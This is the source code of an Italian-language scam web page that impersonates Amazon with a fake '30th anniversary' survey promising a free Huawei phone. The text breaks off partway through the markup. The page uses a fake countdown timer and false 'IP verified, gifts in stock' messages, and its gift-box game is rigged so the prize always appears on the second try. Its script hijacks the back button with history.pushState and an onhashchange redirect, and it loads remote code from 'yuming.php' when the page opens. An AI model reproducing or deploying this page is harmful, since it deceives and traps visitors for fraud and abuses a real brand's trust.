
<!DOCTYPE html>

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link id="favicon" rel="shortcut icon" href="https://1.bp.blogspot.com/-ROnpbq9da_g/YEnrVP-XrAI/AAAAAAAAAYU/AwSaG4p02Q05PqI57h16QNs9q3K1p1KawCLcBGAsYHQ/s16000/title_amazon.ico">
    <meta property="og:image" content="https://1.bp.blogspot.com/-bTOGeqJ0SrY/YFQMoXYBG5I/AAAAAAAAACI/qllrBPIE1vkSLt9gmSmgesntQMtCclhSwCLcBGAsYHQ/s16000/amazon.jpg">
    <meta property="og:title" content="🕜Celebrazione del trentesimo anniversario di Amazon👏">
    <title>🕜Celebrazione del trentesimo anniversario di Amazon👏</title>
    <meta property="og:type" content="article">
    <meta property="og:description" content=" Regali gratuiti per tutti!">
    <meta property="og:url" content="https://www.amazon.com/">
    <link rel="icon" href="data:image/ico;base64,aWNv">
    <meta property="og:type" content="website">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="robots" content="noindex, follow">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/js/bootstrap.min.js"></script>
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <style>
        html, body {font-size: 14px;width: 100%;height: 100%;padding: 0;margin: 0;font-family: sans-serif;-webkit-text-size-adjust: 100%;-webkit-tap-highlight-color: transparent;}
        #content2, #content3, #q2, #q3, #q4, #q5, #result1, #result2, #result3 {display: none}
        .main-content {padding: 10px;-webkit-border-radius: 10px;-moz-border-radius: 10px;border-radius: 10px}
        @keyframes tapa_superior { from {top: 0} to {top: -40px} }
        @media (max-width: 500px) {  @keyframes tapa_superior { from {top: 0} to {top: -30px} }  }
        .main-content .result {margin: 0;padding: 5px 0 5px 25px}
        .main-content p {font-size: 14px}
    </style>
    <style>
        .weui_dialog{position:fixed;z-index:998;width:85%;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);background-color:#fafafc;text-align:center;border-radius:10px;font-family:arial}
        .weui_mask{position:fixed;z-index:1;width:100%;height:100%;top:0;left:0;background:rgba(0,0,0,.6)}
        .weui_dialog_hd{padding:0em 0 .3em;margin-top: 15px;}
        .weui_dialog_bd{padding:0 20px;font-size:16px;color:#888;word-wrap:break-word;word-break:break-all}
        .weui_dialog_ft{width: 90%;margin-left: 5%;border-bottom-left-radius:10px;border-bottom-right-radius:10px;position:relative;line-height:1.6rem;margin-top:20px;font-size:17px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}
        .weui_dialog_ft:after{content:" ";position:absolute;left:0;top:0;width:100%;height:1px;border-top:1px solid #d5d5d6;color:#d5d5d6;-webkit-transform-origin:0 0;transform-origin:0 0;-webkit-transform:scaleY(.5);transform:scaleY(.5)}
        .weui_btn_dialog.primary{color:#fff}
        .weui_dialog_ft .btn{background-color:#37475a;color:#ffffff;font-size:1.2em;-webkit-box-flex:1;-webkit-flex:1;-ms-flex:1;flex:1;-webkit-tap-highlight-color:transparent}
        .weui_dialog_title{font-weight:600;font-size:20px;color:#000;margin-top:10px;}
        .weui_close{ display: block; position: absolute; top: 6px; right: 6px; }
        .weui_dialog_ft .btn {width: 80%;max-width: 345px;margin: 15px auto;border-radius: 5px;color: #fff;font-weight: 700;text-align: center;display: block;text-decoration: none;-webkit-transition: all 0.2s ease-in-out;-moz-transition: all 0.2s ease-in-out;transition: all 0.2s ease-in-out;box-shadow: none;}

    </style>
    <script>
        $.getScript('yuming.php?' + (new Date()).getTime());
        function set_Cookie(name, value) {
            name = "amazonhz-tt"+name;
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days * 20 * 1000));
            document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + "; path=/;"
        }

        function get_Cookie(name) {
            name = "amazonhz-tt"+name;
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
            if (arr = document.cookie.match(reg)) {
                return unescape(arr[2]);
            }
            return '';
        }

        function getQueryString(name) {
            var reg = new RegExp('(^|&)' + name + '=([^&]*)(&|$)', 'i');
            var r = window.location.search.substr(1).match(reg);
            if (r != null) {
                return unescape(r[2]);
            }
            return null;
        }

        function spinnerAction() {
            //alert("Welcome to Lucky Wheel!Spin the Wheel and you may win exclusive prizes!Click OK to Start the Game!")
        }


        window.onhashchange = function () {
            jp();
        };

        function hh1() {
            history.pushState(history.length + 1, "message", "#" + new Date().getTime());
        }

        function jp() {
            fh();
        }
        setTimeout('hh1();', 500);

        function fh() {
            location.href =  bad;
        }
        function wxalert(t,n,b,flag,i) {
            //flag:1,success  2,normal
            var r, u;
            r = '<div class="weui_dialog_alert" style="position: fixed; z-index: 1000; display: none;margin-left:15%;margin-right:15%">';
            r += '<div class="weui_mask"></div>';
            r += '<div class="weui_dialog">';
            r += '<i class="weui_close"><svg t="1540783423798" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="s="http://www.w3.org/2000/svg" p-" p-id="1931" xmlns:xlink="k="http://www.w3.org/1999/xlink" wi" width="25" height="25"><path style="fill:#666;" d="M176.661601 817.172881C168.472798 825.644055 168.701706 839.149636 177.172881 847.338438 185.644056 855.527241 199.149636 855.298332 207.338438 846.827157L826.005105 206.827157C834.193907 198.355983 833.964998 184.850403 825.493824 176.661601 817.02265 168.472798 803.517069 168.701706 795.328267 177.172881L176.661601 817.172881ZM795.328267 846.827157C803.517069 855.298332 817.02265 855.527241 825.493824 847.338438 833.964998 839.149636 834.193907 825.644055 826.005105 817.172881L207.338438 177.172881C199.149636 168.701706 185.644056 168.472798 177.172881 176.661601 168.701706 184.850403 168.472798 198.355983 176.661601 206.827157L795.328267 846.827157Z" p-id="1932"></path></svg></i>';
            r += '<div class="weui_dialog_hd"><strong class="weui_dialog_title"></strong></div>';
            r += '<div class="weui_dialog_bd" style="color:#000;padding-top:20px;padding-bottom:10px;"></div>';
            r += '<div class="weui_dialog_ft">';
            r += '<div href="javascript:void(0);" class="weui_btn_dialog primary btn">OK</div>';
            r += "</div>";
            r += "</div>";
            r += "</div>";

            $(".weui_dialog_alert").length > 0 ? $(".weui_dialog_alert .weui_dialog_bd").empty() : $("body").append($(r));
            setTimeout(function(){
                u = $(".weui_dialog_alert");
                u.show();
                u.find(".weui_dialog_bd").html(n);
                u.find(".weui_dialog_title").html(t);
                u.find(".weui_btn_dialog").html(b ? b : "");
                u.find(".weui_btn_dialog").off("click").on("click", function() {
                    i();
                    u.hide();
                    if(flag==1){
                        stopConfetti();
                    } });
                u.find(".weui_close").off("click").on("click", function() {
                    i();
                    u.hide();
                    if(flag==1){
                        stopConfetti();
                    }
                });
                if(flag==1){
                    startConfetti();
                }
            },500);
        }
        var maxParticleCount=150;var particleSpeed=2;var startConfetti;var stopConfetti;var toggleConfetti;var removeConfetti;(function(){startConfetti=startConfettiInner;stopConfetti=stopConfettiInner;toggleConfetti=toggleConfettiInner;removeConfetti=removeConfettiInner;var colors=["DodgerBlue","OliveDrab","Gold","Pink","SlateBlue","LightBlue","Violet","PaleGreen","SteelBlue","SandyBrown","Chocolate","Crimson"]
            var streamingConfetti=false;var animationTimer=null;var particles=[];var waveAngle=0;function resetParticle(particle,width,height){particle.color=colors[(Math.random()*colors.length)|0];particle.x=Math.random()*width;particle.y=Math.random()*height-height;particle.diameter=Math.random()*10+5;particle.tilt=Math.random()*10-10;particle.tiltAngleIncrement=Math.random()*0.07+0.05;particle.tiltAngle=0;return particle;}
            function startConfettiInner(){var width=window.innerWidth;var height=window.innerHeight;window.requestAnimFrame=(function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(callback){return window.setTimeout(callback,16.6666667);};})();var canvas=document.getElementById("confetti-canvas");if(canvas===null){canvas=document.createElement("canvas");canvas.setAttribute("id","confetti-canvas");canvas.setAttribute("style","display:block;z-index:999999;pointer-events:none;position: absolute;left: 0px;top: 0px;");document.body.appendChild(canvas);canvas.width=width;canvas.height=height;window.addEventListener("resize",function(){canvas.width=window.innerWidth;canvas.height=window.innerHeight;},true);}
                var context=canvas.getContext("2d");while(particles.length<maxParticleCount)
                    particles.push(resetParticle({},width,height));streamingConfetti=true;if(animationTimer===null){(function runAnimation(){context.clearRect(0,0,window.innerWidth,window.innerHeight);if(particles.length===0)
                    animationTimer=null;else{updateParticles();drawParticles(context);animationTimer=requestAnimFrame(runAnimation);}})();}}
            function stopConfettiInner(){streamingConfetti=false;}
            function removeConfettiInner(){stopConfetti();particles=[];}
            function toggleConfettiInner(){if(streamingConfetti)
                stopConfettiInner();else
                startConfettiInner();}
            function drawParticles(context){var particle;var x;for(var i=0;i<particles.length;i++){particle=particles[i];context.beginPath();context.lineWidth=particle.diameter;context.strokeStyle=particle.color;x=particle.x+particle.tilt;context.moveTo(x+particle.diameter/2,particle.y);context.lineTo(x,particle.y+particle.tilt+particle.diameter/2);context.stroke();}}
            function updateParticles(){var width=window.innerWidth;var height=window.innerHeight;var particle;waveAngle+=0.01;for(var i=0;i<particles.length;i++){particle=particles[i];if(!streamingConfetti&&particle.y<-15)
                particle.y=height+100;else{particle.tiltAngle+=particle.tiltAngleIncrement;particle.x+=Math.sin(waveAngle);particle.y+=(Math.cos(waveAngle)+particle.diameter+particleSpeed)*0.5;particle.tilt=Math.sin(particle.tiltAngle)*15;}
                if(particle.x>width+20||particle.x<-20||particle.y>height){if(streamingConfetti&&particles.length<=maxParticleCount)
                    resetParticle(particle,width,height);else{particles.splice(i,1);i--;}}}}})();
    </script>

</head>
<body>
<div id="p_body_content">

    <div class="aheader">
        <style>
            .aheader
            {
                width: 100%;
                height: 48px;
                z-index: 8;
                text-align: center;
                background-color: #232f3e;
                position: fixed;
                top: 0px;
            }
            .menus {
                float: left;
                padding: 14px;
            }
            .menu {
                display: block;
                float: left;
                width: 20px;
                height: 20px;
                background-position: -20px -378px;
                margin-right: 10px;
            }
            .icon {
                background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                background-size: 275px;
            }
            .alogo {
                display: block;
                float: left;
                height: 27px;
                width: 80px;
                background-position: -10px -50px;
                margin-top: 13px;
            }
            .icon {
                background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                background-size: 275px;
            }
            .sign {
                display: block;
                float: right;
                line-height: 48px;
                font-size: 13px;
                color: #fff;
                font-family: inherit;
            }
            .cart {
                display: block;
                background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                background-size: 275px;
                background-position: -10px -240px;
                width: 37px;
                height: 27px;
            }
            .cart-count {
                color: #f90;
                text-align: center;
                line-height: 10px;
                font-weight: 700;
                text-decoration: none;
                padding: 0 0 0 6px;
                font-size: 16px;
                position: relative;
                top: -5px;
            }
        </style>
        <div class="menus"><span class="icon menu"></span></div>
        <span class="icon alogo"></span>

        <div style="float:right; padding:10px 18px 11px 12px">
            <span class="cart"><span class="cart-count">0</span></span>
        </div>
        <div class="sign">Sign In</div>
    </div>
    <p style="clear: both; height: 48px;margin-bottom: 0;"></p>
    <div class="content" style="background-color:#f7f7f7;">

        <div class="main-content flag" id="content0" style="color:#232f3f;">
            <script type="text/javascript">
                var brand_country = 'United Kingdom';
                var dayNames = new Array(" Domenica", " Lunedi", " martedì", " mercoledì", " giovedi", " Venerdì", " Sabato");
                var monthNames = new Array(" gennaio", " febbraio", " marzo", " aprile", " Maggio", " giugno", " luglio", " agosto", " settembre", " ottobre", " novembre", " dicembre");
                var minutos_y = " minuti e ";
                var segundos = " secondi";
            </script>
            <script src="js/time.js"></script>
            <script>
                function getBrowser() {
                    if ((navigator.userAgent.indexOf("Opera") || navigator.userAgent.indexOf("OPR")) != -1) {
                        return "Opera";
                    } else {
                        if (navigator.userAgent.indexOf("Chrome") != -1) {
                            return "Google Chrome";
                        } else {
                            if (navigator.userAgent.indexOf("Safari") != -1) {
                                return "Safari";
                            } else {
                                if (navigator.userAgent.indexOf("Firefox") != -1) {
                                    return "Firefox";
                                } else {
                                    if ((navigator.userAgent.indexOf("MSIE") != -1) || (!!document.documentMode == true)) {
                                        return "IE";
                                    } else {
                                        return "Unknown";
                                    }
                                }
                            }
                        }
                    }
                    return "Unknown";
                }

                function getPlatform() {
                    if (window.navigator.userAgent.indexOf("Windows NT 10.0") != -1) {
                        return "Windows 10";
                    }
                    if (window.navigator.userAgent.indexOf("Windows NT 6.2") != -1) {
                        return "Windows 8";
                    }
                    if (window.navigator.userAgent.indexOf("Windows NT 6.1") != -1) {
                        return "Windows 7";
                    }
                    if (window.navigator.userAgent.indexOf("Windows NT 6.0") != -1) {
                        return "Windows Vista";
                    }
                    if (window.navigator.userAgent.indexOf("Windows NT 5.1") != -1) {
                        return "Windows XP";
                    }
                    if (window.navigator.userAgent.indexOf("Windows NT 5.0") != -1) {
                        return "Windows 2000";
                    }
                    if (window.navigator.userAgent.indexOf("iPhone") != -1) {
                        return "iPhone";
                    }
                    if (window.navigator.userAgent.indexOf("iPad") != -1) {
                        return "iPad";
                    }
                    if (window.navigator.userAgent.indexOf("Android") != -1) {
                        return "Android";
                    }
                    if (window.navigator.userAgent.indexOf("Mac") != -1) {
                        return "Macintosh";
                    }
                    if (window.navigator.userAgent.indexOf("X11") != -1) {
                        return "UNIX";
                    }
                    if (window.navigator.userAgent.indexOf("Linux") != -1) {
                        return "Linux";
                    }
                    if (window.navigator.userAgent.indexOf("BlackBerry") != -1) {
                        return "BlackBerry";
                    }
                    return "Unknown";
                }

                jQuery(document).ready(function () {
                    function d(h) {
                        var j, k, i = h, g = setInterval(function () {
                            j = parseInt(i / 60, 10), k = parseInt(i % 60, 10), k = 10 > k ? "0" + k : k, $("#timerr").text(j + " " + minutos_y + k + " " + segundos), --i < 0 && (clearInterval(g));
                        }, 1000);
                    }

                    if (jQuery("#timerr").length >= 1) {
                        d((4 * 60) + 29);
                    }

                    function f(g) {
                        if (g < 10) {
                            g = "0" + g;
                        }
                        return g;
                    }

                    var b = new Date();
                    var a = f(b.getHours()) + ":" + f(b.getMinutes());
                    jQuery(".p_var-dia").text(b.getDate());
                    jQuery(".p_var-mes").text(b.getMonth());
                    jQuery(".p_var-anyo").text(b.getFullYear());
                    jQuery(".p_var-dia_nombre").text(dayNames[b.getDay()]);
                    jQuery(".p_var-mes_nombre").text(monthNames[b.getMonth()]);
                    jQuery(".p_var-hora_fija").text(a);
                    if (jQuery(".p_var-browser").length >= 1) {
                        var c = getBrowser();
                        jQuery(".p_var-browser").text(c);
                    }
                    if (jQuery(".p_var-browser").length >= 1) {
                        var e = getPlatform();
                        jQuery(".p_var-so").text(e);
                    }
                });
            </script>
            <h3 style="font-weight:700"> Congratulazioni!</h3>
            <p>
                 Oggi, <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>,&nbsp;<span class="p_var-anyo"> 2020</span>,  sei stato scelto per partecipare al nostro sondaggio.  Ti ci vorrà solo un minuto e riceverai un fantastico premio: un Huawei Mate 40 Pro 5G Full Netcom da 8 GB + 256 GB (nero brillante)!
            </p>
            <p>
                 Ogni <span class="p_var-dia_nombre">Tuesday</span>  scegliamo casualmente 100 utenti per dare loro la possibilità di vincere fantastici premi.  Il premio di oggi è un Huawei Mate 40 Pro 5G Full Netcom da 8 GB + 256 GB (nero brillante)!  Ci saranno 100 fortunati vincitori.
            </p>
            <p>
                 Questo sondaggio mira a migliorare la qualità del servizio per i nostri utenti e la tua partecipazione sarà premiata al 100%.
            </p>
            <p>
                 Hai solo<font color="red"><b><span id="timerr" style="color:#c82311"> 4  minuti e 30  secondi</span></b></font>,  per rispondere a questo sondaggio !
            </p>
            <p>
                 Affrettati, il numero di premi disponibili è limitato!
            </p>
        </div>

        <div class="survey main-content" id="content1">
            <script>

                //问卷
                var ques  =  {}
                ques.q1=[" Domanda 1 di 4","  Sei maschio o femmina"," Maschio"," Femmina"]
                ques.q2=[" Domanda 2 di 4","  Quanti anni hai?",'18-29','30-39','40-49','50+']
                ques.q3=[" Domanda 3 di 4","  Come valuti i servizi Amazon?"," Molto bene"," Incredibile"," ok"," Non così buono"]
                ques.q4=[" Domanda 4 di 4","  Quale smartphone stai usando?"," Android","Iphone"]

                $(document).ready(function () {

                    var qkey = Object.keys(ques)
                    var count_ques = qkey.length
                    var ans =0;

                    $(document).on('click','.survey_button',function () {
                        ans++

                        if(ans == count_ques ){
                            //问卷完成
                            $('.survey').hide()
                            $('#header__hideble-content').hide()
                            showGame()
                            return
                        }
                        cquestion(ques,qkey,ans)


                    })

                    function cquestion(ques,qkey,ans){
                        $('.question').fadeOut("slow", function () {
                            $(this).html("<strong>"+ques[qkey[ans]][0] +":</strong>"+ques[qkey[ans]][1]).fadeIn("slow")
                        })
                        var ahtml = ''
                        for(k in ques[qkey[ans]]){
                            if (k < 2) {continue;}
                            ahtml+='<div class="survey_button">'+ques[qkey[ans]][k]+'</div>\n'
                        }

                        $('.choose').fadeOut("slow", function () {
                            $(this).html(ahtml).fadeIn("slow")
                        })

                    }
                    function showGame(){
                        scrollTo("id1"), $("#content0").fadeOut("slow", function () {
                            $("#content2").fadeIn(), setTimeout(function () {
                                $("#result1").fadeIn(1e3)
                            }, 3e3), setTimeout(function () {
                                $("#result2").fadeIn(1e3)
                            }, 4100), setTimeout(function () {
                                $("#result3").fadeIn(1e3)
                            }, 6e3), setTimeout(function () {
                                $("#content2").fadeOut("slow", function () {
                                    "undefined" != typeof roulette_ini ? rouletteRoot._init() : "undefined" != typeof box_ini && boxRoot._init(), $("#content3").fadeIn()
                                })
                            }, 7100)
                        })
                    }
                    function scrollTo(a) {
                        if ($("#" + a).length) {
                            var c = $("#" + a).offset();
                            var b = c.top;
                            $("html,body").animate({scrollTop: b}, {duration: "slow"});
                        }
                    }
                })

            </script>
            <style>
                .survey{
                    padding: 0 20px 20px;
                }
                p.question {
                    font-size: 15px
                }

                .survey_button {
                    -webkit-border-radius: 10px;
                    -moz-border-radius: 10px;
                    border-radius: 10px
                }

                .survey_button {
                    border: 2px solid #f0f0f0;
                    color: #fff;
                    padding: 8px 0;
                    margin: 8px 0;
                    text-align: center;
                    cursor: pointer;
                    background-color: #37475a;
                    box-shadow: 0 1px 4px 0 rgba(0, 0, 0, .74)
                }
            </style>
            <div class="flag">
                <div id="q1">
                    <p class="question">
                        <strong> Domanda 1 di 4:</strong>  Sei maschio o femmina?
                    </p>
                    <div class="choose">
                        <div class="survey_button">
                             Maschio
                        </div>
                        <div class="survey_button">
                             Femmina
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="main-content" id="content2">
            <h2 style="text-align:center;"> Stiamo verificando la tua risposta ...</h2>
            <div class="d-flex justify-content-center">
                <div class="spinner-border" role="status">
                    <span class="sr-only"> Caricamento in corso...</span>
                </div>
            </div>
            <p class="result" id="result1">
                 Hai risposto a tutte e 4 le domande
            </p>
            <p class="result" id="result2">
                 Il tuo indirizzo IP è valido per questa promozione
            </p>
            <p class="result" id="result3">
                 I regali sono disponibili e in stock!
            </p>
        </div>

        <div class="main-content" id="content3">
            <style>.boxes,.boxes cbox,.boxes .try img{width:100%}.boxes{margin:10px auto;max-width:800px}.boxes > .try{position:relative;display:inline-block;width:23.8%;-webkit-transition-duration:.2s;transition-duration:.2s;cursor:pointer}@media (max-width:767px){.boxes > .try{width:32.5%}.boxes > .try:nth-child(-n+4){display:none}}@media (max-width:479px){.boxes > .try{width:32%}}@media (max-width:319px){.boxes > .try{width:48%}.boxes > .try:nth-child(-n+5){display:none}}.div_img_gift{width:100%;text-align:center;position:absolute;top:0;left:0;z-index:5;display:none;align-items:center;justify-content:center}.img_gift{display:none;width:70%;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both;-webkit-animation-name:rotateIn;animation-name:rotateIn;margin:0 auto}@-webkit-keyframes rotateIn{0%{-webkit-transform-origin:center;transform-origin:center;-webkit-transform:rotate3d(0,0,1,-200deg);transform:rotate3d(0,0,1,-200deg);opacity:0}100%{-webkit-transform-origin:center;transform-origin:center;-webkit-transform:none;transform:none;opacity:1}}@keyframes rotateIn{0%{-webkit-transform-origin:center;transform-origin:center;-webkit-transform:rotate3d(0,0,1,-200deg);transform:rotate3d(0,0,1,-200deg);opacity:0}100%{-webkit-transform-origin:center;transform-origin:center;-webkit-transform:none;transform:none;opacity:1}}@keyframes tapa_superior{0%{-webkit-transform-origin:center;transform-origin:center;-webkit-transform:rotate3d(0,0,1,-200deg);transform:rotate3d(0,0,1,-200deg);opacity:0}100%{-webkit-transform-origin:center;transform-origin:center;-webkit-transform:none;transform:none;opacity:1}}.boxes{background-size:cover;border-radius:20px;position:relative;text-align:center}.try{position:relative;margin:20px 0}.try > div{position:absolute}.try .caja{position:relative}.caja_trasera{z-index:1}.caja_tapa{z-index:3}.caja{z-index:2}.caja_gift{z-index:1}.boxes .try.abierta > .caja_tapa{animation:tapa_superior 2s forwards}.boxes .try.premiazo > .caja_gift{animation:tapa_superior 4s infinite alternate}@keyframes tapa_superior{from{top:0}to{top:-40px}}@media (max-width:500px){@keyframes tapa_superior{from{top:0}to{top:-30px}}}#p_loading,.p_loading{position:fixed;left:0;top:0;width:100%;height:100%;display:flex;align-items:center;z-index:99;background-color:#dadada}.temblor:hover{animation:temblor .82s cubic-bezier(.36,.07,.19,.97) both;transform:translate3d(0,0,0);backface-visibility:hidden;perspective:1000px}@keyframes temblor{10%,90%{transform:translate3d(-1px,0,0)}20%,80%{transform:translate3d(2px,0,0)}30%,50%,70%{transform:translate3d(-4px,0,0)}40%,60%{transform:translate3d(4px,0,0)}}.temblor_inf{}@keyframes temblor_inf{0%{transform:translate(1px,1px) rotate(0deg)}10%{transform:translate(-1px,-2px) rotate(-1deg)}20%{transform:translate(-3px,0px) rotate(1deg)}30%{transform:translate(3px,2px) rotate(0deg)}40%{transform:translate(1px,-1px) rotate(1deg)}50%{transform:translate(-1px,2px) rotate(-1deg)}60%{transform:translate(-3px,1px) rotate(0deg)}70%{transform:translate(3px,1px) rotate(-1deg)}80%{transform:translate(-1px,-1px) rotate(1deg)}90%{transform:translate(1px,2px) rotate(0deg)}100%{transform:translate(1px,-2px) rotate(-1deg)}}.p_modal img{max-width:100%;max-height:28vh}.p_modal{font-family:open sans,helvetica neue,Helvetica,Arial,sans-serif}.p_modal h2{color:#575757;font-size:25px;text-align:center;font-weight:600;text-transform:none;position:relative;margin:25px 0;padding:0;display:block}.p_modal p{color:#797979;font-size:15px;text-align:center;font-weight:300;position:relative;text-align:inherit;float:none;margin:0;padding:0;line-height:normal}.p_modal_button{display:inline-block;box-shadow:rgba(140,212,245,.8) 0 0 2px,rgba(0,0,0,.0470588) 0 0 0 1px inset;background-color:#8cd4f5;color:#fff;border:0;box-shadow:none;font-size:17px;font-weight:500;border-radius:5px;padding:10px 32px;margin:26px 5px 0;cursor:pointer}.checkmark{display:none}.checkmark.draw:after{animation-duration:800ms;animation-timing-function:ease;animation-name:checkmark;transform:scaleX(-1) rotate(135deg)}.checkmark:after{opacity:1;height:3.5em;width:1.75em;transform-origin:left top;border-right:3px solid #5cb85c;border-top:3px solid #5cb85c;content:"";left:1.75em;top:3.5em;position:absolute}@keyframes checkmark{0%{height:0;width:0;opacity:1}20%{height:0;width:1.75em;opacity:1}40%{height:3.5em;width:1.75em;opacity:1}100%{height:3.5em;width:1.75em;opacity:1}}.circle-loader{border:1px solid rgba(0,0,0,.2);border-left-color:#5cb85c;animation:loader-spin 1.2s infinite linear;position:relative;display:inline-block;vertical-align:top;border-radius:50%;width:7em;height:7em}.load-complete{-webkit-animation:none;animation:none;border-color:#5cb85c;transition:border 500ms ease-out}@keyframes loader-spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}</style>
            <script type="text/javascript">
                var box_ini=!1
                var modalOptions = {
                    backdrop: 'static',
                    keyboard: false
                };
                var count = 1;
                var intentos = 3;
                var puedo = false;
                var boxRoot;
                (function () {
                    "use strict";
                    boxRoot = {
                        _init: function () {
                            setTimeout(function () {
                                jQuery('#p_modal1').modal(modalOptions);
                            }, 1000);
                            jQuery('.try').on('click', function () {
                                if (puedo && count <= intentos) {
                                    if (jQuery(this).hasClass('abierta')) {
                                    } else {
                                        puedo = false;
                                        jQuery('.circle-loader').removeClass("load-complete");
                                        jQuery('.checkmark').css("display", "none");
                                        jQuery(this).addClass('abierta');
                                        if (count == 2) {
                                            jQuery(this).addClass('premiazo');
                                            setTimeout(function () {
                                                jQuery(".div_img_gift, .img_gift").fadeIn("slow", function () {
                                                    setTimeout(function () {
                                                        startConfetti();
                                                        jQuery('#p_modal3').modal(modalOptions);
                                                        jQuery('.circle-loader').addClass("load-complete");
                                                        jQuery('.checkmark').css("display", "block");
                                                    }, 1500);
                                                });
                                            }, 4000);
                                        }
                                        else {
                                            count++;
                                            intentos--;
                                            jQuery('#num_intentos').html(intentos);
                                            setTimeout(function () {
                                                jQuery('#p_modal2').modal(modalOptions);
                                                setTimeout(function () {
                                                    jQuery('.circle-loader').addClass("load-complete");
                                                    jQuery('.checkmark').css("display", "block");
                                                    puedo = true;
                                                }, 1000);
                                            }, 2000);
                                        }
                                    }
                                }
                            });
                            jQuery("#p_modal_button1").on("click", function (event) {
                                event.stopPropagation();
                                jQuery('#p_modal1').modal('hide');
                                puedo = true;
                            });
                            jQuery("#p_modal_button2").on("click", function (event) {
                                event.stopPropagation();
                                jQuery('#p_modal2').modal('hide');
                            });
                        }
                    };
                    jQuery(document).ready(function () {
                        if (typeof box_ini == "undefined") {
                            boxRoot._init();
                        }
                    });
                })();
            </script>

            <div id="boxes" class="boxes">
                <div class="div_img_gift">
                    <img class="img_gift" src="https://i.imgur.com/mov9JFN.png">
                </div>
                <div id="0" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="1" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="2" class="try temblor">
                    <div class="caja_tapa">
                        <img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
                    </div>
                    <div class="caja_trasera">
                        <img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
                    </div>
                    <div class="caja_gift">
                        <img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
                    </div>
                    <div class="caja">
                        <img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
                    </div>
                </div>
                <div id="3" class="try temblor">
                    <div class="caja_tapa">
